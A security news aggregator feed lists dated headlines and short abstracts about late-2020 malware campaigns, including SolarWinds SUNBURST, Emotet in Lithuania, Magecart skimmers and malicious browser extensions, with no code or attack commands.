Experts from Intezer discovered a new and self-spreading Golang-based malware that targets Windows and Linux servers. Experts from Intezer discovered a Golang-based worm that targets Windows and Linux servers. The malware has been active since...Security Affairs
December 31, 2020
Emotet campaign hits Lithuania’s National Public Health Center and several state institutions Full Text
Abstract
An Emotet campaign hit Lithuania, the malware has infected systems at the National Center for Public Health (NVSC) and several municipalities. A large-scale Emotet campaign hit Lithuania, the malware has infected the networks of Lithuania's National...Security Affairs
December 30, 2020
New Golang worm turns Windows and Linux servers into monero miners Full Text
Abstract
The potential number of systems is staggering: There are 5.5 million MySQL, Tomcat, Jenkins, and WebLogic devices connected to the internet that could be vulnerable.SCMagazine
December 30, 2020
Emotet malware hits Lithuania’s National Public Health Center Full Text
Abstract
The internal networks of Lithuania's National Center for Public Health (NVSC) and several municipalities have been infected with Emotet malware following a large campaign targeting the country's state institutions.BleepingComputer
December 30, 2020
New worm turns Windows, Linux servers into Monero miners Full Text
Abstract
A newly discovered and self-spreading Golang-based malware has been actively dropping XMRig cryptocurrency miners on Windows and Linux servers since early December.BleepingComputer
December 29, 2020
Eliciting Current Activities of Malicious Browser Extensions Full Text
Abstract
With a large user base, it makes it quite easy for cybercriminals to publish malicious browser extensions that perform illicit activities, including spying and data theft, among others.Cyware Alerts - Hacker News
December 29, 2020
Pegasus Spyware: Now Targets New Zero-Day in iPhone Full Text
Abstract
Four nation-state-backed APTs abused Pegasus phone-surveillance solution to target 36 Al Jazeera members by exploiting a zero-day in iPhones, in an espionage attack.Cyware Alerts - Hacker News
December 29, 2020
Mac Attackers Remain Focused Mainly on Adware, Fooling Users Full Text
Abstract
In February 2020, Malwarebytes reported that its Mac users encountered about twice as many "threats" as Windows users. However, it mainly included potentially unwanted programs (PUPs) and adware.Dark Reading
December 29, 2020
AutoHotkey-Based Password Stealer Targeting US, Canadian Banking Users Full Text
Abstract
Threat actors have been discovered distributing a new credential stealer written in AutoHotkey (AHK) scripting language as part of an ongoing campaign that started early 2020. Customers of financial institutions in the US and Canada are among the primary targets for credential exfiltration, with a specific focus on banks such as Scotiabank, Royal Bank of Canada, HSBC, Alterna Bank, Capital One, Manulife, and EQ Bank. Also included in the list is an Indian banking firm ICICI Bank. AutoHotkey is an open-source custom scripting language for Microsoft Windows aimed at providing easy hotkeys for macro-creation and software automation that allows users to automate repetitive tasks in any Windows application. The multi-stage infection chain commences with a malware-laced Excel file that's embedded with a Visual Basic for Applications (VBA) AutoOpen macro, which is subsequently used to drop and execute the downloader client script ("adb.ahk") via a legitimate portable AHKThe Hacker News
December 28, 2020
GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic Full Text
Abstract
A new strand of malware uses Word files with macros to download a PowerShell script from GitHub. This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script.BleepingComputer
December 27, 2020
Attackers Increasingly Adopting VBA-based Attack Techniques Full Text
Abstract
In this technique, malicious Office documents containing VBA code are saved within streams of CFBF files, with VBA macros saving data in a hierarchy including various types of streams.Cyware Alerts - Hacker News
December 27, 2020
Gitpaste-12 Adds New Features to its Arsenal Full Text
Abstract
The recent attacks use payloads hosted on a new GitHub repository, which includes a Linux-based cryptominer, a list of passwords for brute-force attacks, and a statically linked Python 3.9 interpreter.Cyware Alerts - Hacker News
December 27, 2020
New SignSight Supply-Chain Attack Targeted Certification Authority in Southeast Asia Twice Full Text
Abstract
The attackers made changes to software installers available for download from a Vietnam government website. In addition, they added a backdoor to target users of a legitimate application.Cyware Alerts - Hacker News
December 27, 2020
Understanding & Detecting the SUPERNOVA Webshell Trojan Full Text
Abstract
The recent supply chain attack has proven to be one of the most damaging attacks of 2020. Several distinct malware families have emerged in relation to the compromise. These include the SUNBURST backdoor, SUPERNOVA, COSMICGALE & TEARDROP.Sentinel One
December 27, 2020
What We Have Learned So Far about the “Sunburst”/SolarWinds Hack Full Text
Abstract
After a successful infiltration of the supply-chain, the SunBurst backdoor— a file named SolarWinds.Orion.Core.BusinessLayer.dll—was inserted into the software distribution system and installed as part of an update package from the vendor.Fortinet
December 27, 2020
SolarWinds releases updated advisory for SUPERNOVA backdoor Full Text
Abstract
SolarWinds released an updated advisory for the SuperNova malware discovered while investigating the recent supply chain attack. SolarWinds has released an updated advisory for the SuperNova backdoor that was discovered while investigating the recent...Security Affairs
December 27, 2020
Kaspersky Warns Against Dangerous Chrome extensions Full Text
Abstract
These extensions installed in more than 8 million users’ browsers accessed a remote server in the background, trying to download malicious code, a process that our security solutions detect as dangerous.Kaspersky Lab
December 26, 2020
SolarWinds releases updated advisory for new SUPERNOVA malware Full Text
Abstract
SolarWinds has released an updated advisory for the additional SuperNova malware discovered to have been distributed through the company's network management platform.BleepingComputer
December 26, 2020
SUNBURST Performs Anti-Analysis Environment Checks Before Contacting C2 Server Full Text
Abstract
Before reaching out to its C2 server, SUNBURST performs numerous checks to ensure no analysis tools are present. It checks process names, file write timestamps, and Active Directory (AD) domains before proceeding.FireEye
December 26, 2020
10 Different Types of Dangerous Malware Attack and How to Avoid them Full Text
Abstract
Today's topic is basically about types of malware, yes, it's a malicious software which is basically designated to damage, impair, or exploit...Cyber Security News
December 26, 2020
How to Detect and Search for SolarWinds IOCs in LogRhythm Full Text
Abstract
LogRhythm Labs has gathered up the IOCs from CISA, Volexity, and FireEye associated with the recent SolarWinds supply chain attack and made them available in GitHub repository.LogRhythm
December 25, 2020
Fake Amazon gift card emails deliver the Dridex malware Full Text
Abstract
The Dridex malware gang is delivering a nasty gift for the holidays using a spam campaign pretending to be Amazon Gift Cards.BleepingComputer
December 24, 2020
SolarStorm Timeline: Details of the Software Supply-Chain Attack Full Text
Abstract
While this is not the first software supply-chain compromise, it may be the most notable, as the attacker was trying to gain widespread, persistent access to a number of critical networks.Palo Alto Networks
December 24, 2020 Stealthy Magecart
Stealthy Magecart Accidentally Leaks the List of Infected Stores Full Text
Abstract
Recently, Sansec has found a clever remote access trojan (RAT), that has been sneaking in the lanes of hacked eCommerce servers. According...Cyber Security News
December 23, 2020
SolarWinds Campaign Focuses Attention on ‘Golden SAML’ Attack Vector Full Text
Abstract
According to Sygnia, the Golden SAML technique involves attackers first gaining administrative access to an organization's ADFS server and stealing the necessary private key and signing certificate.Dark Reading
December 22, 2020
Hackers Hide Malware in RubyGems Packages Full Text
Abstract
Actors are using malicious RubyGems packages in a supply chain attack to steal cryptocurrency from potential victims. Such attempts by cyber adversaries signal growing threats from various software components.Cyware Alerts - Hacker News
December 22, 2020
Brand New Agent Tesla Now has Improved Data Exfiltration Features Full Text
Abstract
Less-popular web browsers and email clients are under attack by the infamous keylogger Agent Tesla, which is also expanding in its targets with improved data exfiltration features.Cyware Alerts - Hacker News
December 21, 2020
New AridViper Malware Targets Outlook Users Full Text
Abstract
Palo Alto’s Unit42 research team has recently found hacking group AridViper (aka APT-C-23) dropping a new malware called PyMicropsia to target victims in the Middle Eastern region.Cyware Alerts - Hacker News
December 21, 2020
Malicious Chrome & Edge Extensions Installs Over 3 Million Store Full Text
Abstract
Czech Internet security giant Avast found out on December 16th that around 3 million people all over the world have been infected...Cyber Security News
December 21, 2020
Dozens of Journalists’ iPhones Hacked with NSO ‘Zero-Click’ Spyware Full Text
Abstract
Citizen Lab researchers say they have found evidence that dozens of journalists had their iPhones silently compromised with spyware known to be used by nation-states. The spyware was silently delivered, likely over iMessage.TechCrunch
December 19, 2020
The SolarWinds cyberattack: The hack, the victims, and what we know Full Text
Abstract
Since the SolarWinds supply chain attack was disclosed last Sunday, there has been a whirlwind of news, technical details, and analysis released about the hack. Because the amount of information that was released in such a short time is definitely overwhelming, we have published this as a roundup of this week's SolarWinds news.BleepingComputer
December 18, 2020
Stealthy Magecart malware mistakenly leaks list of hacked stores Full Text
Abstract
A list of dozens of online stores hacked by a web skimming group was inadvertently leaked by a dropper used to deploy a stealthy remote access trojan (RAT) on compromised e-commerce sites.BleepingComputer
December 18, 2020
The Strategic Implications of SolarWinds Full Text
Abstract
The infiltration by Russia emphasizes the importance of implementing the layered deterrence strategy recommended by the U.S. Cyber Solarium Commission.Lawfare
December 18, 2020
‘SocGholish’ Attack Framework Powers Surge in Drive-By Attacks Full Text
Abstract
SocGholish impersonates legitimate browser, Flash, and Microsoft Teams updates to trick users into executing malicious ZIP files that are automatically downloaded on visiting an infected webpage.Dark Reading
December 17, 2020
3 million users hit with infected Google Chrome and Microsoft Edge extensions Full Text
Abstract
Google Chrome, specifically, accounts for about 70 percent of the browser market share, making its extensions an efficient mechanism for targeting users with malware.SCMagazine
December 17, 2020
5 million WordPress sites potentially impacted by a Contact Form 7 flaw Full Text
Abstract
The development team behind the Contact Form 7 WordPress plugin discloses an unrestricted file upload vulnerability. Jinson Varghese Behanan from Astra Security discovered an unrestricted file upload vulnerability in the popular Contact Form 7 WordPress...Security Affairs
December 17, 2020
RubyGems Packages Laced with Bitcoin-Stealing Malware Full Text
Abstract
Two malicious software building blocks that could be baked into web applications prey on unsuspecting users.Threatpost
December 17, 2020
3M Users Targeted by Malicious Facebook, Insta Browser Add-Ons Full Text
Abstract
Researchers identify malware existing in popular add-ons for Facebook, Vimeo, Instagram and others that are commonly used in browsers from Google and Microsoft.Threatpost
December 17, 2020
Skimming a Little Off the Top: ‘Meyhod’ Skimmer Hits Hair Loss Specialists Full Text
Abstract
Meyhod itself is simple compared to the Magecart web payment skimmers we've recently analyzed, such as the new variant of the Grelos skimmer and the Ant and Cockroach skimmer.Risk IQ
December 17, 2020
Experts spotted browser malicious extensions for Instagram, Facebook and others Full Text
Abstract
Avast researchers reported that three million users installed 28 malicious Chrome or Edge extensions that could perform several malicious operations. Avast Threat Intelligence researchers spotted malicious Chrome and Edge browser extensions that...Security Affairs
December 17, 2020
Malicious Domain in SolarWinds Hack Turned into ‘Killswitch’ Full Text
Abstract
A malicious domain used to control potentially thousands of compromised computer systems was commandeered by security experts and used as 'killswitch' to turn the cybercrime operation against itself.Krebs on Security
December 17, 2020
Malicious Chrome and Edge Extensions Affect Millions of Users Full Text
Abstract
Avast urges users to uninstall now or risk phishing and data theftInfosecurity Magazine
December 17, 2020
New IRS Form Fraud Campaign Targets G Suite Users Full Text
Abstract
A new scam using an IRS form as its mechanism has been found targeting users of Google's G Suite, with as many as 50,000 executives and "important" employees affected so far.Dark Reading
December 17, 2020
E-Commerce Skimming is the New POS Malware Full Text
Abstract
POS malware planted on payment processing devices has enabled threat actors to steal payment card data from terminals at retail stores, hotels, restaurants and other establishments since at least 2008Security Intelligence
December 17, 2020
New Information Stealer Torjan that Steals Browser Credentials, Outlook Files Full Text
Abstract
A new information-stealing Trojan with relations to the MICROPSIA malware family has been identified, which targets Microsoft Windows systems with an onslaught of data-exfiltration capabilities–...Cyber Security News
December 17, 2020
FireEye, GoDaddy, and Microsoft created a kill switch for SolarWinds backdoor Full Text
Abstract
Microsoft, FireEye, and GoDaddy have partnered to create a kill switch for the Sunburst backdoor that was employed in the recent SolarWinds hack. Microsoft, FireEye, and GoDaddy have created a kill switch for the Sunburst backdoor that was used in SolarWinds...Security Affairs
December 16, 2020
Malicious Chrome, Edge extensions with 3M installs still in stores Full Text
Abstract
Malicious Chrome and Edge browser extensions with over 3 million installs, most of them still available on the Chrome Web Store and the Microsoft Edge Add-ons portal, are capable of stealing users' info and redirecting them to phishing sites.BleepingComputer
December 16, 2020
FireEye, Microsoft create kill switch for SolarWinds backdoor Full Text
Abstract
Microsoft, FireEye, and GoDaddy have collaborated to create a kill switch for the SolarWinds Sunburst backdoor that forces the malware to terminate itself.BleepingComputer
December 16, 2020
Sextortionists Deploy New Spyware Full Text
Abstract
Goontact targets iOS and Android users in Asia who visit sites selling escort servicesInfosecurity Magazine
December 16, 2020
Zebrocy’s Evolution with Golang-Based Version Enjoys Low Detection Full Text
Abstract
Researchers observed a VHD file containing a PDF document and an executable file masquerading as a Microsoft Word document, which actually contained the Zebrocy malware.Cyware Alerts - Hacker News
December 16, 2020
Sextortionist Campaign Targets iOS, Android Users with New Spyware Full Text
Abstract
Goontact lures users of illicit sites through Telegram and other secure messaging apps and steals their information for future fraudulent use.Threatpost
December 16, 2020
Malicious RubyGems packages used in cryptocurrency supply chain attack Full Text
Abstract
New malicious RubyGems packages have been discovered that are being used in a supply chain attack to steal cryptocurrency from unsuspecting users.BleepingComputer
December 16, 2020
New Goontact spyware discovered targeting Android and iOS users Full Text
Abstract
Named Goontact, this mobile malware has the ability to collect from infected victims data such as phone identifiers, contacts, SMS messages, photos, and location information.ZDNet
December 16, 2020
Sextortion campaign uses Goontact spyware to target Android and iOS users Full Text
Abstract
Security experts spotted a new malware strain, named Goontact, that allows its operators to spy on both Android and iOS users. Security researchers from Lookout have discovered new spyware, dubbed Goontcat, that could target both Android and iOS users. Goontact...Security Affairs
December 16, 2020
Microsoft Set to Block SolarWinds Orion Binaries Full Text
Abstract
Malicious updates were responsible for recent Russian attacksInfosecurity Magazine
December 16, 2020
Microsoft to quarantine SolarWinds apps linked to recent hack starting tomorrow Full Text
Abstract
Microsoft announced today plans to start forcibly blocking and isolating versions of the SolarWinds Orion app that are known to have contained the Solorigate (SUNBURST) malware.ZDNet
December 16, 2020
PyMICROPSIA Windows malware includes checks for Linux and macOS Full Text
Abstract
Experts discovered a new Windows info-stealer, named PyMICROPSIA, linked to AridViper group that is rapidly evolving to target other platforms. Experts from Palo Alto Networks's Unit 42 discovered a new Windows info-stealing malware, named PyMICROPSIA,...Security Affairs
December 15, 2020
Microsoft to quarantine compromised SolarWinds binaries tomorrow Full Text
Abstract
Microsoft has announced today that Microsoft Defender will begin quarantining compromised SolarWind Orion binaries starting tomorrow morning.BleepingComputer
December 15, 2020
Adrozek Malware Silently Hijacks Microsoft Edge, Google Chrome, Yandex & Firefox Browsers Full Text
Abstract
Recently, Microsoft 365 Defender Research affirmed that they had recorded a new malware that has been continuously attacking popular browsers like Google...Cyber Security News
December 15, 2020
New Windows malware may soon target Linux, macOS devices Full Text
Abstract
Newly discovered Windows info-stealing malware linked to an active threat group tracked as AridViper shows signs that it might be used to infect computers running Linux and macOS.BleepingComputer
December 15, 2020
Global Campaign Uses Sunburst Malware to Target Government Agencies Worldwide Full Text
Abstract
The campaign has targeted consulting, technology, telecom, and other entities such as multiple federal government agencies, including the US Treasury and Commerce departments.Cyware Alerts - Hacker News
December 15, 2020
Kaspersky researchers found 360,000 malicious files per day in 2020 Full Text
Abstract
The vast majority of the malicious files detected – 89.8 percent – occurred via Windows PE files, a file format specific to Windows operating systems.SCMagazine
December 15, 2020
Gitpaste-12 Worm Widens Set of Exploits in New Attacks Full Text
Abstract
The worm returned in recent attacks against web applications, IP cameras and routers.Threatpost
December 15, 2020
SolarWinds Orion and UNC2452 – Summary and Recommendations Full Text
Abstract
The Russia-linked UNC2452 threat actor group has been observed leveraging a supply chain compromise to serve backdoored updates for the SolarWinds Orion Platform software.TrustedSec
December 15, 2020
SoReL-20M Sophos & ReversingLabs release 10 million disarmed samples for malware study Full Text
Abstract
Sophos and ReversingLabs released SoReL-20M, a database containing 20 million Windows Portable Executable files, including 10M malware samples. Sophos and ReversingLabs announced the release of SoReL-20M, a database containing 20 million Windows Portable...Security Affairs
December 15, 2020
SoReL-20M: Sophos & ReversingLabs release 10 million disarmed samples for malware study Full Text
Abstract
Sophos and ReversingLabs announced the release of SoReL-20M, a database containing 20 million Windows Portable Executable (PE) files, including 10 million malware samples.Security Affairs
December 14, 2020
PyMICROPSIA: New Information-Stealing Trojan from AridViper Full Text
Abstract
Unit 42 researchers have been tracking the threat group AridViper, which has been targeting the Middle Eastern region, and identified a new information stealer with relations to the MICROPSIA malware.Palo Alto Networks
December 14, 2020
The SolarWinds Breach: Why Your Work Computers Are Down Today Full Text
Abstract
The information security news cycle went into overdrive yesterday afternoon. First, Reuters revealed that the Commerce and Treasury departments suffered significant intrusions. The Washington Post soon followed up with multiple sources attributing the attack to the Russian foreign intelligence service, the SVR—in particular, a portion of the SVR known as Cozy Bear—although there is no official attribution yet. Within a few hours, FireEye and Microsoft announced that this was a “supply chain attack” involving SolarWinds Orion software, and the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive. Today, it turns out that the attackers also compromised the Department of Homeland Security. SolarWinds revealed to the Securities and Exchange Commission that the breach may affect 18,000 customers.Lawfare
December 14, 2020
SoReL-20M: A Huge Dataset of 20 Million Malware Samples Released Online Full Text
Abstract
Cybersecurity firms Sophos and ReversingLabs on Monday jointly released the first-ever production-scale malware research dataset to be made available to the general public that aims to build effective defenses and drive industry-wide improvements in security detection and response. " SoReL-20M " (short for So phos- Re versing L abs – 20 M illion), as it's called, is a dataset containing metadata, labels, and features for 20 million Windows Portable Executable (.PE) files, including 10 million disarmed malware samples, with the goal of devising machine-learning approaches for better malware detection capabilities. "Open knowledge and understanding about cyber threats also leads to more predictive cybersecurity," Sophos AI group said. "Defenders will be able to anticipate what attackers are doing and be better prepared for their next move." Accompanying the release are a set of PyTorch and LightGBM -based machine learning models pre-trainedThe Hacker News
December 14, 2020
Hacking group’s new malware abuses Google and Facebook services Full Text
Abstract
Molerats cyberespionage group has been using in recent spear-phishing campaigns fresh malware that relies on Dropbox, Google Drive, and Facebook for command and control communication and to store stolen data.BleepingComputer
December 11, 2020
Skimmers hide in social media buttons and CSS files, but the next big threat lies with the server Full Text
Abstract
Happy shopping: Beyond standard skimming techniques that focus on the client-side, attackers are increasingly focusing on back-end applications.SCMagazine
December 11, 2020
Microsoft: New malware can infect over 30K Windows PCs a day Full Text
Abstract
Microsoft has warned of an ongoing campaign pushing a new browser hijacking and credential-stealing malware dubbed Adrozek which, at its peak, was able to take over more than 30,000 devices every day.BleepingComputer
December 10, 2020
Hackers can use WinZip insecure server connection to drop malware Full Text
Abstract
The server-client communication in certain versions of the WinZip file compression tool is insecure and could be modified to serve malware or fraudulent content to users.BleepingComputer
December 09, 2020
Qbot malware switched to stealthy new Windows autostart method Full Text
Abstract
A new Qbot malware version now activates its persistence mechanism right before infected Windows devices shutdown and it automatically removes any traces when the system restarts or wakes up from sleep.BleepingComputer
December 09, 2020
Credit card stealer hides in CSS files of hacked online stores Full Text
Abstract
Credit card stealer scripts are evolving and become increasingly harder to detect due to novel hiding tactics. The latest example is a web skimmer that uses CSS code to blend within the pages of a compromised store and to steal customers' personal and payment information.BleepingComputer
December 09, 2020
Russian hackers hide Zebrocy malware in virtual disk images Full Text
Abstract
Russian-speaking hackers behind Zebrocy malware have changed their technique for delivering malware to high-profile victims and started to pack the threats in Virtual Hard Drives (VHD) to avoid detection.BleepingComputer
October 29, 2020
MAR-10310246-2.v1 – PowerShell Script: ComRAT Full Text